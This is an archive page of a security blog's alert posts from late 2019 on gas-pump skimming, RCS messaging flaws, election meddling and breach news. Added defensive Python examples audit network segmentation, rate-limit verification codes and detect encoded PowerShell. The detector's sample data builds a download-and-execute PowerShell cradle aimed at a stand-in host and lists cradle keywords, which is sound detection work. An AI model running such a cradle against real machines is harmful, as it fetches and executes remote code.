Category Archives: Alert

Security alerts

VISA SAYS: Ongoing Cyber Attacks at Gas Pumps

Visa published an alert that says that point of sale (PoS) systems of North American Fuel Dispenser Merchants (as in gas stations and the folks that make the systems that allow you to “pay at the pump”) are being targeted in credit card skimming attacks.

The attack is ongoing, increasing and coordinated – by cybercrime groups.

The Visa fraud disruption unit alert described several attacks.  Stores were supposed to install chip readers by 2015 (if they didn’t, they get to pay for any fraud linked to their lack of chip card readers), but gas stations got an extension and are only now installing chip readers in pumps (they were supposed to do it by October 2019, but now they have until October 2020).

One of the benefits of chip readers is that the card information is encrypted at the pump and not decrypted until it arrives at the gas station’s bank.  Since most pumps still have not been upgraded, the data does not get encrypted until it leaves the gas station, if at all.

This means that if the hacker can get malware installed in the gas station they can likely read the credit cards.

Here is the part that affects all businesses:

Individual gas stations are independent from the brands, for the most part, and many are completely independent.  That makes them small businesses that don’t have an IT department.

The attacks usually start by infecting the computer in the office – someone is bored and surfs the web.  They visit a sketchy web site and click on an infection link.

Because gas station owners are not IT or security experts, everything is on the same network – as is often the case in many (most?) small to medium sized businesses.

What businesses need to do is SEGMENT their networks – separate different parts of their business from each other – the WiFi should be separate from the credit card system from the smart TV, from the gas pumps, etc.

Doing that makes it MUCH harder for hackers in any business to get to where they want.  In the Target breach, the hackers compromised a server used by vendors to get projects and submit invoices, but that server, because of a lack of segmentation, could talk to the credit card system.

It takes a little work to design a correctly segmented network that will limit the damage that hackers can do while still letting your employees do what they need to do, but recovering from an attack takes a lot more work than preventing one.
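To make the segmentation point concrete, here is an added example (not from the original post, and not any vendor’s product): a small zone model of a shop network with a default-deny allow-list between zones, run over a few constructed firewall flow records. The subnets, zone names, ports and flows are all made up for illustration; the point is that the office-to-PoS and guest-to-pump flows are visible and deniable in the segmented design, while the same flows are invisible to the firewall in the flat design.

```python
"""Zone-based segmentation check for a small business network.

Added example (not from the original post): the zones, addresses and the
sample flow records below are constructed to show what a segmented
allow-list looks like and what it catches that a flat network cannot.
"""
import ipaddress

# Segmented design: each business function gets its own subnet / VLAN.
ZONES = {
    "office":  ipaddress.ip_network("10.0.10.0/24"),  # back-office PCs
    "guest":   ipaddress.ip_network("10.0.20.0/24"),  # customer WiFi
    "payment": ipaddress.ip_network("10.0.30.0/24"),  # PoS, pump controllers
    "iot":     ipaddress.ip_network("10.0.40.0/24"),  # smart TV, cameras
}

# Anything outside a known zone is treated as "internet".
# Allow-list of permitted cross-zone flows: (src zone, dst zone, dst port).
# Cross-zone traffic not listed here is denied; note nothing may reach "payment".
ALLOWED = {
    ("payment", "internet", 443),  # terminals talk only to the payment processor
    ("office",  "internet", 443),
    ("office",  "internet", 80),
    ("guest",   "internet", 443),
    ("guest",   "internet", 80),
    ("iot",     "internet", 443),
}

# Flat design: the "everything on the same network" case from the post.
FLAT_ZONES = {"lan": ipaddress.ip_network("10.0.0.0/16")}
FLAT_ALLOWED = {("lan", "internet", 443), ("lan", "internet", 80)}


def zone_of(ip, zones=ZONES):
    """Map an address to its zone name, or "internet" if it is in no zone."""
    addr = ipaddress.ip_address(ip)
    for name, net in zones.items():
        if addr in net:
            return name
    return "internet"


def is_allowed(src_ip, dst_ip, dst_port, zones=ZONES, allowed=ALLOWED):
    """Default-deny between zones; traffic inside one zone is not filtered."""
    src, dst = zone_of(src_ip, zones), zone_of(dst_ip, zones)
    if src == dst:
        return True
    return (src, dst, dst_port) in allowed


def audit(flows, zones=ZONES, allowed=ALLOWED):
    """Return flows that cross a zone boundary without an allow-list entry."""
    violations = []
    for src_ip, dst_ip, dst_port in flows:
        if not is_allowed(src_ip, dst_ip, dst_port, zones, allowed):
            violations.append(
                (zone_of(src_ip, zones), zone_of(dst_ip, zones), src_ip, dst_ip, dst_port)
            )
    return violations


# Constructed flow records (src, dst, dst port), e.g. exported from a firewall.
SAMPLE_FLOWS = [
    ("10.0.30.5", "203.0.113.10", 443),  # terminal -> payment processor
    ("10.0.10.7", "203.0.113.10", 443),  # office PC browsing
    ("10.0.10.7", "10.0.30.5", 445),     # office PC reaching into the PoS over SMB
    ("10.0.20.9", "10.0.30.5", 22),      # guest WiFi client poking at a pump controller
    ("10.0.30.5", "10.0.30.6", 9100),    # PoS to PoS, inside the payment zone
]

if __name__ == "__main__":
    for v in audit(SAMPLE_FLOWS):
        print("DENY / ALERT:", v)
    # In the flat design the same two flows are just "LAN to LAN" and never seen:
    print("flat network violations:", audit(SAMPLE_FLOWS, FLAT_ZONES, FLAT_ALLOWED))
```

The same allow-list is what you would express as VLAN-to-VLAN firewall rules on a small business router; the audit function is the check you would run over exported flow logs to see whether the rules actually hold.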

On a separate note, if you are concerned about your credit card getting compromised at a gas pump, you can do a couple of things to improve your odds:

  • Use a pump closest to the store – it is the least likely to have a skimmer attached.  That won’t help if the hacker installs malware on the station’s network though
  • Patronize gas stations that have upgraded their pumps (those are the ones that tell you to leave your card in the reader until they ask you to remove it)
  • Pay inside – sometimes but not always – that computer gets upgraded before the pumps get upgraded.  Watch how they process your card – if they swipe it, it hasn’t been upgraded.  If they insert it and wait, it has been
  • Last option, if you have to, pay cash

Gas stations are frequent targets because crooks can get to the pump at 3:00 in the morning when no one is there and they have really poor cybersecurity, except, MAYBE, for stations that are owned by the oil companies themselves.  Apparently, according to Visa, that is becoming a real problem, but it is a great opportunity for other businesses to get ahead of the attacks.

Source: Bleeping Computer

From Unsecure to Less Unsecure

Text messages, as many people know, are not very secure.  If you are asking where we are meeting for lunch, you probably don’t care.  But many banks use text messages (technically known as SMS or Short Message Service) as a second factor to enhance login security.  While it does help some, it would be a lot better if SMS messages were secure.

Add to that the limited character length allowed in SMS (only a bit longer than the original Twitter at 162 characters, though that limit is sometimes masked by phone makers’ text messaging applications), the fact that photos sent by SMS have to be compressed down until they are barely identifiable, and the fact that it can be hijacked, and we have been needing a replacement.

Enter RCS or Rich Communications Services.  RCS eliminates a lot of these shortcomings.  Supposedly the big four (soon to be three) US carriers say it is coming in 2020, even though the standard has been around for 10 years.

But the way the carriers are implementing it is not very secure as researchers are starting to point out.

While you can pick a different text messaging app like iMessage, Whatsapp or Signal, for example, for talking to your friends and have enhanced privacy with them, you don’t have any control over which text messaging service your bank uses, leaving you more vulnerable than alternative solutions such as Google Authenticator or Authy, generically known as Time based One Time Passwords or TOTP.

So what are the carriers doing wrong?

SRSLabs researchers are going to talk about the holes that they have found at Black Hat Europe in December.  Hopefully the carriers get embarrassed and fix some of these bugs before the systems go live next year.

The issues SRSLabs found are in the way the RCS standard is being implemented, rather than in the standard itself.  This is actually good news because it means that a software patch can improve security without requiring changes to the standard.  Even with these fixes, RCS is **NOT** encrypted end to end like iMessage or Whatsapp.

One issue is how RCS configuration files, which contain the user id and password for your text messages, are secured.  In that case, there is no security at all, meaning any app can request the configuration file and gain access to your text messages.

Another implementation sends a six digit code to verify that you are who you say you are, but lets you have unlimited guesses.  Trying all of the possible codes takes about five minutes.
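The fix for the unlimited-guesses problem is on the server side, so here is an added example (not from the post and not any carrier’s RCS code) of what a six digit verification code check should look like: the code expires, it can only be used once, and after a handful of wrong guesses it is burned so that even the right code no longer works. The lifetime and attempt limit are assumptions chosen for illustration; the simulated guesser shows that instead of a five minute walk through all million codes, an attacker gets five tries, a 0.0005% chance.

```python
"""One-time verification code with expiry, attempt limit and one-time use.

Added example, not from the post or from any carrier's RCS implementation.
CODE_TTL and MAX_ATTEMPTS are assumptions for illustration.
"""
import secrets
import time

CODE_DIGITS = 6
CODE_TTL = 300        # seconds a code stays valid (assumption)
MAX_ATTEMPTS = 5      # wrong guesses allowed before the code is burned (assumption)


class CodeVerifier:
    """Issue one pending code per user and verify it under the three rules above."""

    def __init__(self):
        self._pending = {}  # user -> {"code", "expires_at", "attempts"}

    def issue(self, user, now=None, rng=secrets.randbelow):
        """Create and store a fresh code. `rng` is injectable only so tests are deterministic."""
        now = time.time() if now is None else now
        code = str(rng(10 ** CODE_DIGITS)).zfill(CODE_DIGITS)
        self._pending[user] = {"code": code, "expires_at": now + CODE_TTL, "attempts": 0}
        return code

    def is_pending(self, user):
        return user in self._pending

    def check(self, user, guess, now=None):
        """True only for the right code, within its lifetime and attempt budget."""
        now = time.time() if now is None else now
        entry = self._pending.get(user)
        if entry is None:
            return False
        if now > entry["expires_at"]:
            del self._pending[user]          # expired codes are discarded
            return False
        entry["attempts"] += 1
        if secrets.compare_digest(entry["code"], guess):
            del self._pending[user]          # one-time use: a code never verifies twice
            return True
        if entry["attempts"] >= MAX_ATTEMPTS:
            del self._pending[user]          # burned: the user must request a new code
        return False


def brute_force_budget(verifier, user, now=None):
    """Simulate guessing codes in order until the server stops accepting guesses.

    Returns (found, attempts_made). With MAX_ATTEMPTS enforced this ends after
    a handful of guesses instead of all 10**CODE_DIGITS of them.
    """
    attempts = 0
    for n in range(10 ** CODE_DIGITS):
        if not verifier.is_pending(user):
            break
        attempts += 1
        if verifier.check(user, str(n).zfill(CODE_DIGITS), now):
            return True, attempts
    return False, attempts


if __name__ == "__main__":
    v = CodeVerifier()
    v.issue("demo-user", now=0)
    print("guessing stopped after:", brute_force_budget(v, "demo-user", now=1))
```

The attempt counter lives with the code, not with the network connection, so reconnecting or switching IP addresses does not reset it; that is the detail an implementation with "unlimited guesses" is missing.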

The carriers, of course, are completely defensive, but I suspect after Black Hat makes their sloppiness public, many of the carriers will clean up their acts.

Which is good for users.

Bottom line though, if you want more private text messages, use something like iMessage or Signal – RCS is not going to solve that problem.  Even if the carriers fix their implementation bugs in RCS, it will just be less unsecure.  Source: Vice

In Case You Thought Russia Was Done Meddling With Elections …

Politics is a pretty interesting game.

In the United States, almost everyone, except the President, thinks that Russia interfered with the 2016 US Presidential elections.

In the UK, there is a report – that the current Prime Minister Boris Johnson has refused to release – on Russian interference in British politics, with some accusing Johnson of a coverup.

Likely in both cases, there are additional agendas.

There is a British election this week after Johnson was unable to get Parliament to agree to his plan for leaving the EU (sound familiar?  The last British PM lost her job for the same reason).  And since politics is a full contact sport everywhere, Johnson’s competitor for the job, Jeremy Corbyn, released some documents that say that Johnson would offer to sell Britain’s National Health Service (NHS) to United States corporations in a trade deal with President Trump.  In Britain, the NHS is considered a national treasure and offering to privatize it to a foreign company is not considered a route to getting yourself elected.  Corbyn “declined” to say where he got the documents and the British government says that they think the documents are real.

One of the places these documents were posted was the social media site Reddit.

Reddit said this past week that the document leak was part of a Russian influence operation known as Secondary Infektion.  It is likely that Secondary Infektion is part of the Russian hacking group Sandworm (if you are interested in this kind of intrigue, I highly recommend the book Sandworm), which is part of Russia’s military Intelligence known as GRU.  As a result of their investigation, Reddit has banned 61 accounts.  Of course, there is nothing to stop the Russians from creating new accounts.

The combination of Johnson’s refusal to release the report on past Russian hacking of British elections, the posting of these new documents, and Corbyn’s use of them indicates that Russian interference in worldwide politics has not stopped or slowed down.

It also means that, short of a miracle, Russia will likely interfere with the US elections next year.  Using cyber theft (DNC emails, Clinton Emails, Boris Johnson documents) is far easier than hacking into a whole bunch of election machines and changing votes, so that is likely the route the Russians will take next year.

Whether Russia’s release of the Boris Johnson documents will affect this week’s British Prime Minister’s election is unknown and even if Johnson loses, he can blame many factors other than Russia for his loss.

Still, it shows that politics remains a full contact sport – a reality that is not likely to change anytime soon.

Information for this post came from the Guardian.

Security News for the Week Ending December 6, 2019

Caller Poses as CISA Rep in Extortion Scam

Homeland Security’s CISA (Cybersecurity and Infrastructure Security Agency) says that they are aware of a scam where a caller pretends to be a CISA rep and claims to have knowledge of the potential victim’s questionable behavior.  The caller then attempts to extort the potential victim.

CISA says not to fall for the scam, do not pay the extortion and contact the FBI.  Source: Homeland Security.

Senate Committee Approves $250 Mil for Utility Security

The PROTECT program would provide grants for utilities to improve their security.  Given that a carefully distributed government report says that the Russians (and not the Chinese) have compromised a number of US utilities already, improving security is probably a smart idea.  The nice part is that it is a grant.  The important part is that the money would be spread out over 5 years, so in reality, we are talking about spending $50 million a year.  It also seems to be focused on electric and doesn’t seem to consider water or other utilities.  There are around 3,300 electric utilities alone in the US.  If we ignore everything but electric and spread the money equally (which of course, they won’t), every utility would get $15,000.  That will definitely get the job done.  NOT!  Source: Nextgov

Smith & Wesson’s online Store Hacked by Magecart

Lawrence Abrams of Bleeping Computer fame tried to warn Smith & Wesson that their online store had been compromised by the famous Magecart malware.  They join the likes of British Airways (183 million Euro fine) and thousands of others.  Abrams did not hear back from them by publication time.  Source: Bleeping Computer

Another MSP Hit by Ransomware Attack

CyrusOne, one of the larger MSPs, was hit by a ransomware attack which affected some of their customers.  As I said in my blog post earlier this week, attacks against MSPs are up because they are juicier targets.

In CyrusOne’s case, they said the victims were primarily in a data center in New York (which hopefully means that they have segmented their network), that it did not affect their colo customers, only their managed customers (because in a colo, the provider does not have credentials to their customers’ servers), and that they are investigating.

This is just one more reminder that you can outsource responsibility to a service provider, but the buck still stops with you when the provider is hacked.  Source: MSSP Alert

Reuters Says Census Test Run in 2018 Was Attacked By Russia

Commerce outsourced the first digital census to Pegasystems and at last check the cost has doubled to $167 million.  More importantly, in a 2018 test, Russian hackers (not China) were able to penetrate a firewall and get into places where they should not have been.  In addition, the test was hit with DNS attacks.

Sources say this raises concerns whether T-Rex Solutions, the Commerce Department’s main security contractor, can keep the Russians out when the site actually goes live.  Or the Chinese. Or other countries that would like to embarrass us.

Census said (a) no comment, (b) no data was stolen (this was likely a reconnaissance test by the Russians, so no surprise) and (c) the system worked as designed (i.e. the Russians got in and we panicked).

Clearly if the Russians are able to compromise the Census, that would be a HUGE black eye for this President and the Executive Branch.

They can hide things during a test, but cannot hide them when it goes live, so let’s hope they are able to fix it.  Source: Reuters

Feds Offer $5 Mil For Evil Corp. Leader

Not sure if this is inspired by the Mr. Robot Series (Evil Corp) or not, but this guy is in big trouble now.

He is being charged with conspiracy, conspiracy to commit fraud, wire fraud, bank fraud and intentional damage to a computer.

The feds say that he stole tens of millions using the banking trojans Dridex and Zeus.  He drives a custom Lamborghini, they say.

In addition to putting out the arrest warrant, Treasury is sanctioning his company.

While I don’t think that President Trump’s bestie, Vladimir Putin, is going to turn the guy over to us, as a high roller, the Treasury sanctions mean that he cannot access the U.S. financial system – banks, credit cards, wire transfers, etc. will all be frozen if he tries.  He also cannot travel to all of those beautiful, warm, scenic vacation spots he is used to.  I hear Kiev is nice this time of year, however.  If he goes through customs in any country we have an extradition treaty with, he will be immediately arrested.  That recently happened when a Russian hacker visited Israel.  He is now in federal custody awaiting trial in the United States after spending 4 years in a nice Israeli prison.

$5 million is the largest reward the feds have ever offered for something like this.

Of course, in the decade that he has been active, he stole tens of millions of dollars from his victims by using those trojans to empty their bank accounts.  By 2015 Dridex was among the active banking trojans in the wild.

The trojan would transfer money to the account of a “money mule” and the mules would then forward the money on to the bad guys, keeping a slice for themselves.

The trojan targeted banks, companies, cities; even non-profits, as well as individuals.

Separately, the FBI issued an alert about this trojan.  It is still pretty active, stealing people’s money.  It can interfere with your web browsing (redirecting you to attacker controlled web sites), among other nasty actions.  This version can even lead to a ransomware attack, encrypting files on your computer.  Sometimes the attack is combined with Powershell Empire, which allows it to do reconnaissance and move laterally to other machines on your network.  This combination would allow it to encrypt all computers on your network.
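Since the Empire part of that combination is what turns one infected PC into a network-wide problem, here is an added example of the kind of check a defender can run over process-creation logs (this is not from the post or the FBI alert, and not a product’s detection rule). Empire-style launchers typically start PowerShell with a hidden window and a base64-encoded command; the scanner below decodes that argument and looks for download-and-execute markers. The three sample command lines are constructed, with the decoded text built in the block itself, and the flag names and marker list are my assumptions about what is worth alerting on.

```python
"""Flag encoded / hidden PowerShell launches in process-creation logs.

Added example, not from the post or the FBI alert. Windows logs a process's
command line in event 4688 when command-line auditing is on; the values in
SAMPLE_CMDLINES are constructed stand-ins for that field.
"""
import base64
import binascii
import re

# "-e", "-ec", "-enc" or "-EncodedCommand" followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
# "-w hidden" / "-WindowStyle Hidden" / "-w 1": the window the user never sees.
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+(?:hidden|1)\b")
# Markers common in download-and-execute one-liners (matched as whole words).
MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
           "invoke-webrequest", "frombase64string")


def encode_ps(text):
    """Encode a command the way powershell -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_ps(blob):
    """Inverse of encode_ps; returns None if the blob is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze(cmdline):
    """Describe one command line: encoded? hidden window? what does the payload contain?"""
    result = {"encoded": False, "hidden": bool(HIDDEN.search(cmdline)),
              "decoded": None, "markers": []}
    m = ENC_FLAG.search(cmdline)
    if m:
        result["encoded"] = True
        result["decoded"] = decode_ps(m.group(1))
    text = (result["decoded"] or cmdline).lower()
    result["markers"] = [k for k in MARKERS if re.search(r"\b" + re.escape(k) + r"\b", text)]
    return result


def is_suspicious(result):
    """Alert on cradle markers, or on encoded + hidden together (the usual launcher shape)."""
    return bool(result["markers"]) or (result["encoded"] and result["hidden"])


def scan(cmdlines):
    """Return (index, analysis) for every command line worth an analyst's attention."""
    return [(i, r) for i, r in ((i, analyze(c)) for i, c in enumerate(cmdlines))
            if is_suspicious(r)]


# Constructed "Process Command Line" values: a normal scheduled script, an
# admin's harmless encoded one-liner, and a hidden encoded download cradle.
SAMPLE_CMDLINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -EncodedCommand "
    + encode_ps("Get-Service | Where-Object Status -eq 'Running'"),
    "powershell -NoP -NonI -W Hidden -Enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
]

if __name__ == "__main__":
    for idx, r in scan(SAMPLE_CMDLINES):
        print(f"line {idx}: hidden={r['hidden']} markers={r['markers']}")
        print("  decoded:", r["decoded"])
```

Decoding rather than just flagging “-enc” matters: plenty of legitimate admin tooling uses encoded commands (the second sample), so the decoded text is what lets an analyst tell the two apart quickly.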

If you do not have access to the FBI alert, contact me;  I cannot post it publicly but I can provide a copy to appropriate people.

While the FBI is not saying, given the size of the reward offered and also the alert, there must be a lot of (stolen) money involved.

Information for this post came from Threat Post and the FBI.

British Nuke Plant Attack Kept Quiet

The nuclear power industry has always been nervous about people’s fear of some form of nuclear meltdown.  Whether it was Three Mile Island or Chernobyl, the spectre of something bad happening at a nuclear plant has been the story of made for TV movies.

The UK Telegraph newspaper has obtained information, using a freedom of information request, that indicates that the UK National Cyber Security Center, part of the GCHQ (sort of equivalent to the US NSA), has been helping a British nuclear plant recover from a cyber attack.

This news comes after reports last year from the FBI and DHS that the Russians (and not the Chinese) have been attacking our critical infrastructure, at least since 2016.

Because they are worried that people will freak out, they are keeping the details of who was hacked and what was hacked secret.  I am sure that will make people feel better.  Unless the attack was really bad.  In which case not knowing and speculating might be better than knowing.

The document, from a Nuclear Decommissioning Agency Board Meeting was dated March 13, 2019.  The Telegraph says that it is likely the first KNOWN successful cyber attack on a British nuclear plant.  I am not sure how comforting that is.  They are not suggesting that it is the first successful attack but rather the first successful attack that we have heard about.

Since no one is providing details, we don’t know whether this is a Chernobyl-style issue or a random computer virus on an office computer.  On the other hand, if they had to ask GCHQ for help, I am guessing that it is not an office virus.

One security expert pointed out that if you assume whichever nuke plant or plants were hacked are no less secure than the ones that haven’t been hacked YET, it isn’t smart to tell other hackers how this or these plants were hacked.

This follows on to the revelation in October that an Indian nuclear plant was hacked – after they first said that reports of a hack were a lie.  I guess the lie was by the Indian government.

This also follows the WSJ article that said that more than a dozen US utilities were targeted (I assume successfully) by hackers recently.

In fairness we should not forget that the US hacked Iran’s nuclear program years ago.  We would say that we are the good guys, so that is okay.  Not everyone might agree with that interpretation, including Russia, so they might say that the US legitimized hacking the nuclear industry.  Source: The Telegraph.